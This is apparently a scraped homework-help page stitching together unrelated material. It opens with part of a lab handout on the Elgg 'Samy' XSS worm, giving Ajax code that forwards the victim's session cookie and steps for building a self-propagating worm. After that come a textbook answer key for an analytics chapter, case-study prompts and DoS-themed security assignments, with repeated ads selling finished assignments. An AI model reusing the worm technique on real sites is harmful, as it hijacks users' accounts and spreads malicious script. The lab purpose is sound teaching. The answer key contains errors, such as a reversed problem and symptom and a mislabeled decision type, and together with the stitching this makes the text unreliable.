
{

//Create and send Ajax request to modify profile

Ajax=null;

Ajax=new XMLHttpRequest();

Ajax.open(“POST”,sendurl,true);

Ajax.setRequestHeader(“Host”,”www.xsslabelgg.com”);

Ajax.setRequestHeader(“Keep-Alive”,”300″);

Ajax.setRequestHeader(“Connection”,”keep-alive”);

 

// JavaScript code to access session cookie

Ajax.setRequestHeader(“Cookie”,document.cookie);

Ajax.setRequestHeader(“Content-Type”,”application/x-www-form-urlencoded”);

Ajax.send(content);

}

</script>

 

 

Note that in this case the POST method is used to send the HTTP request.

To modify the victim’s profile, the HTTP request sent by the worm should contain certain information about the victim in the HTML body of the request (which is sent via the content variable):

· The __elgg_ts and __elgg_token values are present in the web page (right-click and “View Page Source”) and the worm needs to find out and use this information using JavaScript code.

· The victim’s user name can be obtained using elgg.session.user.name

· The victim’s id (guid) can be obtained using elgg.session.user.guid

 

Important note: Be careful when dealing with an infected profile. If a profile is already infected by the XSS worm, you may want to leave them alone, instead of modifying them again. If you are not careful, you may end up removing the XSS worm from the profile.

 

What you need to do:

1. Based on the format of the POST request to change a user’s profile, write a JavaScript script that changes the “About me” field in the profile of any user (the victim) who views Samy’s profile. The “About me” field should contain the following text:

Samy is my HERO (added by <insert your team member name/s here>

Save your JavaScript script in a file task4-2.txt.

2. Login as user Samy and inject in the “About me” field of Samy’s profile the script from file task4-2.txt. (Make sure to select “Remove editor” before editing this field, in order to disable any automatic formatting)

3. Logout and login as user Alice, and then view Samy’s profile by selecting user Samy from “More => Members” in the Elgg menu. At this point, the malicious Javascript script will be executed and Alice’s profile will be changed.

4. Include in your project document:

a. a screen printout with Alice’s profile after viewing Samy’s profile.

b. a printout of your JavaScript file task4-2.txt.

5. Include the file task4-2.txt in a ZIP archive and upload this ZIP archive onto the Moodle website for the course.

 

v. Writing a Self-Propagating XSS Worm

 

To become a real worm, the malicious JavaScript program should be able to propagate itself. Namely, whenever some people view an infected profile, not only will their profiles be modified, the worm will also be propagated to their profiles, further affecting others who view these newly infected profiles. This way, the more people view the infected profiles, the faster the worm can propagate. This is exactly the same mechanism used by the Samy Worm: within just 20 hours of its October 4, 2005 release, over one million users were affected, making Samy one of the fastest spreading viruses of all time. The JavaScript code that can achieve this is called a self-propagating cross-site scripting worm. In this task, you need to implement such a worm, which infects the victim’s profile.

To achieve self-propagation, when the malicious JavaScript modifies the victim’s profile, it should copy itself to the victim’s profile. If the entire JavaScript program (i.e., the worm) is embedded in the infected profile, to propagate the worm to another profile, the worm code can use DOM APIs to retrieve a copy of itself from the web page. An example of using DOM APIs is given below. This code gets a copy of itself, and display it in an alert window:

 

<script id=worm>

var strCode = document.getElementById(“worm”);

alert(strCode.innerHTML);

</script>

 

 

URL Encoding: All messages transmitted using HTTP over the Internet use URL Encoding, which converts all non-ASCII characters such as space to special code under the URL encoding scheme. In the worm code, messages sent to Elgg should be encoded using URL encoding. The escape function can be used to URL encode a string. An example of using the encode function is given below.

<script>

var strSample = “Hello World”;

var urlEncSample = escape(strSample);

alert(urlEncSample);

</script>

 

Under the URL encoding scheme, the “+” symbol is used to denote space. In JavaScript programs, “+” is used for both arithmetic operations and string concatenation operations. To avoid this ambiguity, you may use the concat function for string concatenation, and avoid using addition. For the worm code in the exercise, you don’t have to use additions. If you do have to add a number (e.g a+5), you can use subtraction (e.g a-(-5)).

 

Other notes:

· To modify the victim’s profile, the HTTP request sent by the worm should contain the following information in the HTML body of the request (which is sent via the content variable):

&accesslevel%5Bdescription%5D=2

(in fact, using the LiveHTTPHeaders extension, you can see this is included in a regular edit profile request)

· Be careful when dealing with an infected profile. If a profile is already infected by the XSS worm, you may want to leave them alone, instead of modifying them again. If you are not careful, you may end up removing the XSS worm from the profile.

 

What you need to do:

1. Based on the format of the POST request to change a user’s profile, write a JavaScript script that changes the “About me” field in the profile of any user (the victim) who views an infected profile. The “About me” field should contain the following text:

Samy is my HERO (added by <insert your team member name/s here>)

Save your JavaScript script in a file task5.txt.

2. Login as user Samy and inject in the “About me” field of Samy’s profile the script from file task5.txt. (Make sure to select “Remove editor” before editing this field, in order to disable any automatic formatting)

3. Logout and login as user Alice, and then view Samy’s profile by selecting user Samy from “More => Members” in the Elgg menu. At this point, the malicious Javascript script will be executed and Alice’s profile will be infected as well.

4. Logout and login as user Boby, and then view Alice’s profile by selecting user Alice from “More => Members” in the Elgg menu. At this point, the malicious Javascript script will be executed and Boby’s profile will be infected as well.

5. Include in your project document:

a. a screen printout with Alice’s profile after viewing Samy’s profile.

b. a screen printout with Boby’s profile after viewing Alice’s profile.

c. A printout of your JavaScript file task5.txt.

6. Include the file task5.txt in a ZIP archive and upload this ZIP archive onto the Moodle website for the course.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

I Need Help In Completing My Task

Sharda_dss11_im_01.doc

image1.png

Chapter 1:

An Overview of Analytics, and AI

Learning Objectives for Chapter 1

· Understand the need for computerized support of managerial decision making

· Understand the development of systems for providing decision-making support

· Recognize the evolution of such computerized support to the current state of analytics/data science and artificial intelligence

· Describe the business intelligence (BI) methodology and concepts

· Understand the different types of analytics and review selected applications

· Understand the basic concepts of artificial intelligence (AI) and see selected applications

· Understand the analytics ecosystem to identify various key players and career opportunities

CHAPTER OVERVIEW

The business environment (climate) is constantly changing, and it is becoming more and more complex. Organizations, both private and public, are under pressures that force them to respond quickly to changing conditions and to be innovative in the way they operate. Such activities require organizations to be agile and to make frequent and quick strategic, tactical, and operational decisions, some of which are very complex. Making such decisions may require considerable amounts of relevant data, information, and knowledge. Processing these in the framework of the needed decisions must be done quickly, frequently in real time, and usually requires some computerized support. As technologies are evolving, many decisions are being automated, leading to a major impact on knowledge work and workers in many ways. This book is about using business analytics and artificial intelligence (AI) as a computerized support portfolio for managerial decision making. It concentrates on the theoretical and conceptual foundations of decision support as well as on the commercial tools and techniques that are available. The book presents the fundamentals of the techniques and the manner in which these systems are constructed and used. We follow an EEE (exposure, experience, and exploration) approach to introducing these topics. The book primarily provides exposure to various analytics/AI techniques and their applications. The idea is that students will be inspired to learn from how various organizations have employed these technologies to make decisions or to gain a competitive edge. We believe that such exposure to what is being accomplished with analytics and that how it can be achieved is the key component of learning about analytics. In describing the techniques, we also give examples of specific software tools that can be used for developing such applications. However, the book is not limited to any one software tool, so students can experience these techniques using any number of available software tools. We hope that this exposure and experience enable and motivate readers to explore the potential of these techniques in their own domain. To facilitate such exploration, we include exercises that direct the reader to Teradata University Network (TUN) and other sites that include team-oriented exercises where appropriate. In our own teaching experience, projects undertaken in the class facilitate such exploration after students have been exposed to the myriad of applications and concepts in the book and they have experienced specific software introduced by the professor. This chapter has the following sections:

CHAPTER OUTLINE

1.1 Opening Vignette: How Intelligent Systems Work for KONE Elevators and Escalators Company

1.2 Changing Business Environments and Evolving Needs for Decision Support and Analytics

1.3 Decision-Making Processes and Computer Decision Support Framework

1.4 Evolution of Computerized Decision Support to Business Intelligence/ Analytics/Data Science

1.5 Analytics Overview

1.6 Analytics Examples in Selected Domains

1.7 Artificial Intelligence Overview

1.8 Convergence of Analytics and AI

1.9 Overview of the Analytics Ecosystem

1.10 Plan of the Book

1.11 Resources, Links, and the Teradata University Network Connection

ANSWERS TO END OF SECTION REVIEW QUESTIONS( ( ( ( ( (

Opening Vignette Questions

1. It is said that KONE is embedding intelligence across its supply chain and enables smarter buildings. Explain.

KONE uses a variety of IoT applications to record and communicate a wide variety of systems status and performance information that can then be used to identify issues and collect important data for future applications.

2. Describe the role of IoT in this case.

IoT allows for the collection of multiple discrete points of data throughout the systems that can be used in a variety of applications.

3. What makes IBM Watson a necessity in this case?

IBM Watson serves to both collect and analyze the wide variety of information presented. It can then communicate this information to other systems and establish patterns based on the data collected.

4. Check IBM Advanced Analytics. What tools were included that relate to this case?

The tools available have many possible applications to the case, specifically the ability to evaluate the data collected across a large number of systems and different parameters.

5. Check IBM cognitive buildings. How do they relate to this case? This solution uses many similar technologies that appears to focus primarily on the ability to detect issues and potential issues within the building.

Section 1.2 Review Questions

1. Why is it difficult to make organizational decisions?

Organizational decisions may be difficult to make due to a complex process necessary to both identify and define the problem as well as evaluate the host of different possible solutions.

2. Describe the major steps in the decision-making process.

· 1.Define the problem (i.e., a decision situation that may deal with some difficulty or with an opportunity).

· 2. Construct a model that describes the real-world problem.

· 3. Identify possible solutions to the modeled problem and evaluate the solutions.

· 4. Compare, choose, and recommend a potential solution to the problem.

3. Describe the major external environments that can impact decision making.

· Political factors. Major decisions may be influenced by both external and internal politics. An example is the 2018 trade war on tariffs.

· Economic factors. These range from competition to the genera and state of the economy. These factors, both in the short and long run, need to be considered.

· Sociological and psychological factors regarding employees and customers. These need to be considered when changes are being made.

· Environment factors. The impact on the physical environment must be assessed in many decision-making situations.

4. What are some of the key system-oriented trends that have fostered IS-supported decision making to a new level?

Computer applications have shifted from merely processing transaction and monitoring activities to actively analyzing and seeking solution to problems through cloud-based systems.

5. List some capabilities of information technologies that can facilitate managerial decision making.

· Group communication and collaboration

· Improved data management.

· Managing giant data warehouses and Big Data

· Analytical support.

· Overcoming cognitive limits in processing and storing information

· Knowledge management.

· Anywhere, anytime support.

Section 1.3 Review Questions

1. List and briefly describe Simon’s four phases of decision making.

Simon’s four phases of decision making are intelligence, design, choice, and implementation.

· Intelligence consists of gathering information by examining reality, then identifying and defining the problem. In this phase problem ownership should also be established.

· Design consists of determining alternatives and evaluating them. If the evaluation will require construction of a model, that is done in this phase as well.

· The choice phase consists of selecting a tentative solution and testing its validity.

· Implementation of the decision consists of putting the selected solution into effect.

2. What is the difference between a problem and its symptoms?

Problems arise out of dissatisfaction with the way things are going. It is the result of a difference or gap between what we desire and what is or is not happening. A symptom is how a problem manifests itself. A familiar personal example is a high temperature (symptom) and an illness (problem). It is necessary to diagnose and treat the underlying illness. Attempting to relieve the temperature works if the illness is one which the body’s defenses can cure, but, can be disastrous in other situations. A business example: high prices (problem) and high unsold inventory level (symptom). Another is quality variance in a product (symptom) and poorly calibrated or worn-out manufacturing equipment (problem).

3. Why is it important to classify a problem?

Classifying a problem enables decision makers to use tools that have been developed to deal with problems in that category, perhaps even including a standard solution approach.

4. Define implementation.

Implementation involves putting a recommended solution to work, but not necessarily implementing a computer system.

5. What are structured, unstructured, and semistructured decisions? Provide two examples of each.

· Structured problem, the procedures for obtaining the best (or at least a good enough) solution are known. Examples would include commonly and historically addressed issues and problems within a business or industry.

· Unstructured decisions are fuzzy, complex problems for which there are no cut-and-dried solution methods. Examples would include issues or problems within a business or industry that combined multiple structured problems or problems where the necessary data or research is not readily available.

· Unstructured problem is one where the articulation of the problem or the solution approach may be unstructured in itself. Examples would include problems within the business or industry where the definition of the problem itself is not agreed upon where the data is not readily available and there may currently exist no ability to collect that data.

6. Define operational control, managerial control, and strategic planning. Provide two examples of each.

· Operational control focuses on the day to day monitoring and control over plans with existing measures and defined actions. Examples may include monitoring Accounts Receivable or controlling inventory.

· Managerial control focuses on short-term control over existing plans where existing actions and measures may be defined, that may also require individual or group decision-making to apply or amend to meet the required result. Examples may include preparing budgets and negotiating contracts.

· Strategic planning focuses on mid and long term planning that directs the core activities and initiatives of the business. Examples may include decisions to make major purchases or conduct research and development.

7. What are the nine cells of the decision framework? Explain what each is for.

The nine cells of the decision framework (see figure 1.2) aligns the three types of decisions (structured, semistructured and unstructured) with the three types of control (operational, managerial and strategic). Each of these cells can provide information about the types of decisions that need to be made based on the availability of information on past decisions or data for decision-making as well as the level of the decision-making involved.

8. How can computers provide support for making structured decisions?

Computers can be instrumental in providing information for structured decisions because they can be used to collect the underlying data needed for the decision as well as providing a known system to abstract analyze and classify possible actions or results.

9. How can computers provide support for making semistructured and unstructured decisions? In these situations, computers can be used to collect the underlying information needed for decision as well as potentially applying some of the learnings from past solutions that may exist. Additionally they may provide the computational ability to conduct a thorough analysis of the identified problem.

Section 1.4 Review Questions

1. List three of the terms that have been predecessors of analytics.

These terms include decision support systems (DSS), executive information systems (EIS) and business intelligence (BI).

2. What was the primary difference between the systems called MIS, DSS, and Executive Information Systems?

The primary differences between the systems are the amount of information available for analysis as well as the sophistication of the display and problem solving capabilities of each.

3. Did DSS evolve into BI or vice versa?

Systems and products referred to as DSS transitioned into the BIA label, although both are content free expressions and mean different things to different professionals.

4. Define BI.

Business intelligence (BI) is an umbrella term that combines architectures, tools, databases, analytical tools, applications, and methodologies.

5. List and describe the major components of BI.

There are three major components to BI:

· the data warehouse environment that organizes summarizes and standardizes business data

· the business analytic environment which uses the data warehouse to access and manipulate data to display results

· the performance and strategy component that utilizes information from the analytic environment to create more detailed analyses and strategy

6. Define OLTP.

Online transaction processing (OLTP) systems handle a company’s routine ongoing business.

7. Define OLAP.

Online analytical processing (OLAP) systems are used to process information and research requests.

8. List some of the implementation topics addressed by Gartner’s report.

The Gartner report proposed splitting planning and executing into four categories; business organization functionality and infrastructure components.

9. List some other success factors of BI. Other success factors may include ease of availability of software and solutions for self-service, integration of DI into the corporate culture and appropriate integration between various BI tools.

Section 1.5 Review Questions

1. Define analytics.

The term replaces terminology referring to individual components of a decision support system with one broad word referring to business intelligence. More precisely, analytics is the process of developing actionable decisions or recommendations for actions based upon insights generated from historical data. Students may also refer to the eight levels of analytics and this simpler descriptive language: “looking at all the data to understand what is happening, what will happen, and how to make the best of it.”

2. What is descriptive analytics? What various tools are employed in descriptive analytics?

Descriptive analytics refers to knowing what is happening in the organization and understanding some underlying trends and causes of such occurrences. Tools used in descriptive analytics include data warehouses and visualization applications.

3. How is descriptive analytics different from traditional reporting?

Descriptive analytics gathers more data, often automatically. It makes results available in real time and allows reports to be customized.

4. What is a DW? How can DW technology help in enabling analytics?

A data warehouse, introduced in Section 1.7, is the component of a BI system that contains the source data. As described in this section, developing a data warehouse usually includes development of the data infrastructure for descriptive analytics—that is, consolidation of data sources and making relevant data available in a form that enables appropriate reporting and analysis. A data warehouse serves as the basis for developing appropriate reports, queries, alerts, and trends.

5. What is predictive analytics? How can organizations employ predictive analytics?

Predictive analytics is the use of statistical techniques and data mining to determine what is likely to happen in the future. Businesses use predictive analytics to forecast whether customers are likely to switch to a competitor, what customers are likely to buy, how likely customers are to respond to a promotion, and whether a customer is creditworthy. Sports teams have used predictive analytics to identify the players most likely to contribute to a team’s success.

6. What is prescriptive analytics? What kind of problems can be solved by prescriptive analytics?

Prescriptive analytics is a set of techniques that use descriptive data and forecasts to identify the decisions most likely to result in the best performance. Usually, an organization uses prescriptive analytics to identify the decisions or actions that will optimize the performance of a system. Organizations have used prescriptive analytics to set prices, create production plans, and identify the best locations for facilities such as bank branches.

7. Define modeling from the analytics perspective.

As Application Case 1.6 illustrates, analytics uses descriptive data to create models of how people, equipment, or other variables operate in the real world. These models can be used in predictive and prescriptive analytics to develop forecasts, recommendations, and decisions.

8. Is it a good idea to follow a hierarchy of descriptive and predictive analytics before applying prescriptive analytics?

As noted in the analysis of Application Case 1.5, it is important in any analytics project to understand the business domain and current state of the business problem. This requires analysis of historical data, or descriptive analytics. Although the chapter does not discuss a hierarchy of analytics, students may observe that testing a model with predictive analytics could logically improve prescriptive use of the model.

9. How can analytics aid in objective decision making?

As noted in the analysis of Application Case 1.4, problem solving in organizations has tended to be subjective, and decision makers tend to rely on familiar processes. The result is that future decisions are no better than past decisions. Analytics builds on historical data and takes into account changing conditions to arrive at fact-based solutions that decision makers might not have considered.

10. What is Big Data analytics?

The term Big Data refers to data that cannot be stored in a single storage unit. Typically, the data is arriving in many different forms, be they structured, unstructured, or in a stream. Big Data analytics is analytics on a large enough scale, with fast enough processing, to handle this kind of data.

11. What are the sources of Big Data?

Major sources include clickstreams from Web sites, postings on social media, and data from traffic, sensors, and the weather.

12. What are the characteristics of Big Data?

Today Big Data refers to almost any kind of large data that has the characteristics of volume, velocity, and variety. Examples include data about Web searches, such as the billions of Web pages searched by Google; data about financial trading, which operates in the order of microseconds; and data about consumer opinions measured from postings in social media.

13. What processing technique is applied to process Big Data?

One computer, even a powerful one, could not handle the scale of Big Data. The solution is to push computation to the data, using the MapReduce programming paradigm.

Section 1.6 Review Questions

1. What are three factors that might be part of a PM for season ticket renewals?

Examples might include ticket cost, marketing and team success.

2. What are two techniques that football teams can use to do opponent analysis?

Examples might include frequency of running plays and individual athlete trends and matchups.

3. What other analytics uses can you envision in sports?

Many examples exist including maintenance of facilities and accuracy of referees.

4. Why would a health insurance company invest in analytics beyond fraud detection? Why is it in its best interest to predict the likelihood of falls by patients?

There are many possible applications, for example insurance companies may want to evaluate causes for conditions so that those conditions can be avoided. An excellent example of this is patient falls. Having this information allows for preventive measures to be taken before a fall occurs.

5. What other applications similar to prediction of falls can you envision?

Student responses will vary that may include prediction of other conditions such as cancer.

6. How would you convince a new health insurance customer to adopt healthier lifestyles (Humana Example 3)?

Data can be used to demonstrate to a customer that adoption of a healthier lifestyle may limit the negative experiences associated with various conditions or diseases.

7. Identify at least three other opportunities for applying analytics in the retail value chain beyond those covered in this section.

Student responses will vary.

8. Which retail stores that you know of employ some of the analytics applications identified in this section?

Student responses will vary.

9. What is a common thread in the examples discussed in image analytics?

In each analysis a detailed understanding of both the image data and other supplementary data sources were used to create solutions.

10. Can you think of other applications using satellite data along the lines presented in this section?

Student responses will vary.

Section 1.7 Review Questions

1. What are the major characteristics of AI?

• Technology that can learn to do things better over time.

• Technology that can understand human language.

• Technology that can answer questions.

2. List the major benefits of AI.

• Significant reduction in the cost of performing work. This reduction continues over time while the cost of doing the same work manually increases with time.

• Work can be performed much faster.

• Work is consistent in general, more consistent than human work.

• Increased productivity and profitability as well as a competitive advantage are the major drivers of AI.

3. What are the major groups in the ecosystem of AI? List the major contents of each.

· Major Technologies include machine learning, deep learning and intelligent agents.

· Knowledge-based technologies include expert systems, recommendation engines, chat bots, virtual personal assistants and robo advisors.

· Biometric related technologies include natural language processing and other biometric recognition technologies

· support theories, tools and platforms include a variety of disciplines such as computer science, cognitive science, control theory, linguistics, mathematics, neuroscience, philosophy, psychology, and statistics.

· Tools and platforms include the various software applications and systems available from a wide number of vendors.

4. Why is machine learning so important?

Machine learning presents the promise of creating more effective and accurate solutions to problems without the direct intervention of individuals.

5. Differentiate between narrow and general AI.

Narrow AI focuses on a specific, defined domain whereas general AI may cross multiple domains and become more powerful as it is refined.

6. Some say that no AI application is strong. Why?

No AI currently performs the full range of human cognitive capabilities.

7. Define assisted intelligence, augmented intelligence, and autonomous intelligence.

· Assisted intelligence is the equivalent of week AI and works within narrow domains.

· Augmented intelligence use computer abilities to extend human cognitive abilities.

· Automated intelligence perform a broad range of functions without human intervention.

8. What is the difference between traditional AI and augmented intelligence?

These systems are designed to extend human capabilities as opposed to replacing them.

9. Relate types of AI to cognitive computing.

Not addressed in this chapter, but students may note that both can be designed to perform tasks.

10. List five major AI applications for increasing the food supply.

Examples include increasing productivity of farm equipment, improved planting and harvesting, improving food nutrition, reducing the cost of food processing, driverless machines, picking fruits and vegetables, pest control improvements and weather monitoring.

11. List five contributions of AI in medical care.

Examples include disease prediction, tracking medication intake, telepresence, improved diagnostics, more efficient supply chains, personal diagnoses, providing medical information and others.

Section 1.8 Review Questions

1. What are the major benefits of intelligent systems convergences?

This convergence allows for a greater number of overall features and applications to more complex problems as multiple systems can be combined.

2. Why did analytics initiatives fail at such a high rate in the past?

Responses will vary but may focus on a lack of availability of data, lack of processing tools and complexity of the required analysis.

3. What synergy can be created by combining AI and analytics?

AI may be used to automatically locate, visualize and narrate important items and can be used to create predictions that can be compared to actual performance. These activities will free up time for more analytics.

4. Why is Big Data preparation essential for AI initiatives?

AI works best when it has access to robust data sources. Properly preparing big data for use in AI allows data to be used completely and effectively.

5. What are the benefits of adding IoT to intelligent technology applications?

The primary benefit is the inclusion of additional data that can be used for various types of analysis.

6. Why it is recommended to use blockchain in support of intelligent applications? The use of block chain technology can add security to data in a distributed network.

Section 1.9 Review Questions

(This section has no review questions.)

Section 1.10 Review Questions

(This section has no review questions.)

ANSWERS TO APPLICATION CASE QUESTIONS FOR DISCUSSION( (

Application Case 1.1: Making Elevators Go Faster!

1. Why this is an example relevant to decision making?

This is an example of how the symptoms may not directly reveal the problem (perceived versus actual wait time being the issue).

2. Relate this situation to the intelligence phase of decision making.

This situation demonstrates how the intelligence phase of decision-making is important because detailed problem identification is necessary in order to create a satisfactory solution.

Application Case 1.2: SNAP DSS Helps OneNet Make Telecommunications Rate Decision

(No questions in this case)

Application Case 1.3: Silvaris Increases Business with Visual Analysis and Real-Time Reporting Capabilities

1. What was the challenge faced by Silvaris?

Material prices changed rapidly and it was necessary to receive a real-time view of data without moving that data to a separate reporting format.

2. How did Silvaris solve its problem using data visualization with Tableau?

Tableau allow the company to easily connect and visualize live data and create dashboards for reporting purposes.

Application Case 1.4: Siemens Reduces Cost with the Use of Data Visualization

1. What challenges were faced by Siemens visual analytics group?

The group needed to provide a wide range of reports for different organizational needs while maintaining consistency and self-service ability.

2. How did the data visualization tool Dundas BI help Siemens in reducing cost?

The system allowed them to create highly interactive dashboards that enabled early detection of issues.

Application Case 1.5: Analyzing Athletic Injuries

1. What types of analytics are applied in the injury analysis?

In this example both reporting and predictive analysis were included.

2. How do visualizations aid in understanding the data and delivering insights into the data?

These visualizations made understanding and depicting the information easier by displaying healing time based on position, severity of injury or injuries healing time treatment offered in the associated healing time etc.

3. What is a classification problem?

An issue that occurs in this case when the type of healing category is incorrectly identified, leading to an incorrect prediction of healing time.

4. What can be derived by performing sequence analysis?

Student responses may vary, but in this example it may be possible to predict how one injury may result in other injuries later.

Application Case 1.6: A Specialty Steel Bar Company Uses Analytics to Determine Available-to-Promise Date

1. Why would reallocation of inventory from one customer to another be a major issue for discussion?

This action may require a discount to the first customer or may result in the delay that may jeopardize the customer relationship.

2. How could a DSS help make these decisions?

A DSS system would provide greater visibility into actual inventories, expected inventories and potential customer implications of reallocation of inventory.

Application Case 1.7: A Specialty Steel Bar Company Uses Analytics to Determine Available-to-Promise Date

1. What is the purpose of knowing how much ground is covered by green foliage on a farm? In a forest?

In a farm setting, this may indicate the level of plant growth. In a forest setting, this may provide details on how the forest is evolving.

2. Why would image analysis of foliage through an app be better than a visual check?

It will provide a more consistent quantitative estimate than individual qualitative perceptions of growth.

3. Explore research papers to understand the underlying algorithmic logic of image analysis. What did you learn?

Student research and responses will vary. Results may indicate that there are different methods of analysis and that this is a rapidly changing field.

4. What other applications of image analysis can you think of?

Student responses will vary.

Application Case 1.8: AI Increases Passengers’ Comfort and Security in Airports and Borders

1. List the benefits of AI devices to travelers.

Benefits will include faster processes such as recognition, more accurate processes and providing additional services.

2. List the benefits to governments and airline companies.

Benefits will include more accurate, faster and more cost efficient services being provided.

3. Relate this case to machine vision and other AI tools that deal with people’s biometrics

This case provides an example of how machine vision and other AI tools can be used as a part of biometric recognition systems that more quickly and accurately identify individuals as they enter an airport.

Application Case 1.9: Robots Took the Job of Camel-Racing Jockeys for Societal Benefits

1. It is said that the robots eradicated the child slavery. Explain.

This is because robots have replaced children who in the past may have been kidnapped to act as jockeys.

2. Why do the owners need to drive by their camels while they are racing?

This is necessary for the camels to react and run. Additionally owners can vary their interaction with the camel based on how the camel is performing in comparison to the others in the race.

3. Why not duplicate the technology for horse racing?

Student opinions and responses will vary, but may focus on the lack of child slavery in Western horseracing.

4. Summarize ethical aspects of this case (Read Boddington, 2017). Do this exercise after you have read about ethics in Chapter 14.

Student responses will vary.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Case Study Question From From Pages 433 And 465-467

Note: –  Must require——–

APA format (Times New Roman, size 12 and 2 space)

MS Visio diagram OR MS Word Smart Art

Minimum 3 or more References including Sharda(Below)

W5: Case Studies

Graded Assignment:  Case Studies – (Follow all steps below)

Carefully review and read both case studies found in your textbook from Pages 433 and 465-467

Sharda, R., Delen, D., & Turban, E. (2015) Business intelligence and analytics: Systems for decision support (10th ed.). Boston: Pearson.

Digital: ISBN-13: 978-0-13-340193-6 or Print: ISBN-13: 978-0-13-305090-5

When concluding the paper, expand your analytical and critical thinking skills to develop ideas as a process or operation of steps visually represented in a flow diagram or any other type of created illustration to support your idea which can be used as a proposal to the entity or organization in the cases to correct or improve any case related issues addressed.  This is required for both cases.

When developing illustrations to support a process or operation of steps, Microsoft Word has a tool known as “Smart Art” which is ideal for the development of these types of illustrations or diagrams.  To get acquainted with this tool, everyone can visit www.youtube.com using a keyword search “Microsoft Word Smart Art Tutorials” to find many video demonstrations in using this tool.

QUESTIONS FOR THE END-OF-CHAPTER from Page# 433

APPLICATION CASE

1. What were the main challenges encountered by CARE International before they created their warehouse prepositioning model?

2. How does the objective function relate to the organization’s need to improve relief services to affected areas?

3. Conduct online research and suggest at least three other applications or types of software that could handle the magnitude of variable and constraints CARE International used in their MIP model.

4. Elaborate on some benefits CARE International stands to gain from implementing their pre-positioning model on a large scale in future.

QUESTIONS FOR THE END-OF-CHAPTER (Page NO#465-467)

APPLICATION CASE 

1. Describe the problem that a large company such as HP might face in offering many product lines and options.

2. Why is there a possible conflict between marketing and operations?

3. Summarize your understanding of the models and the algorithms.

4. Perform an online search to find more details of the algorithms.

5. Why would there be a need for such a system in an organization?

6. What benefits did HP derive from implementation of the models?

Conclusion

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Case Project 9-1

Case Project 9-1: DoS attacks are one of the easier attacks to perpetrate on a network, so

They’re often used by people who have a grudge against a company or are

out to commit acts of vandalism. To read about some well-known DoS

attacks, go to www.grc.com/freepopular.htm and look for the Original DDoS

Report, which discusses an attack perpetrated on that Web site by a 13-

year-old. Read the report and write a synopsis of how the attack was carried

out and what could have been done to prevent it.

1.      What’s the largest attack volume (in Gbps) as of the papers writing?

2.      What percentage of companies were hit by a DDos attack in 2013?

3.      What’s the trend for the current method attackers use to perpetrate DDos attacks?

4.       Using the chart on page 7 of the report, what’s the trend for the type of attacks being perpetrated?

Case Project 9-2: Using the information on open ports you found with NetInfo in Hands-On Project 9-5, research these ports to determine their function and whether leaving them open is safe. A Google search is a good place to begin your research. Write a summary of what you found and list which open ports pose a security risk.

 

Case Project 9-3: Search for security policy templates on the Internet. A good place to start is the

SANS Institute (www.sans.org). Using one or more of the templates you find,

develop a security policy for your school or a business.

 

Case Project 9-4: A small research company in Pittsburgh is working to develop a new method of mass storage to replace current hard drive technology. Four engineers and an office manager work there the engineers are highly skilled professionals, and the office manager is a capable computer user. The company has a high-bandwidth Internet connection because employees must conduct research frequently. The employees have hopes of making a breakthrough and bringing the company public within the next two years. You’ve been hired as a security consultant to assess the company’s needs.  Write a paper recommending what type of security policy should be used (open, moderately restrictive, or high restrictive) and what security technologies should be used. On what areas should the security policy focus (physical security, data security, auditing, passwords, and so forth), and what technologies should be used to secure these areas?

 

Case Project 9-5: An architectural firm of eight employees, each with a networked desktop computer, wants you to develop a security policy for the company. Management

has emphasized that ease of use is paramount, and little time is available for

training. Working in small groups, each group should write a list of questions

aimed at getting enough information for developing the policy. After determining

the questions, each group should interview another group, with the other

group posing as the architectural firm and answering the list of questions.

What level of security should the policy reflect? Use one of the templates you

found in Case Project 9-3 to develop a policy based on the answers the other

group supplies.

 

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!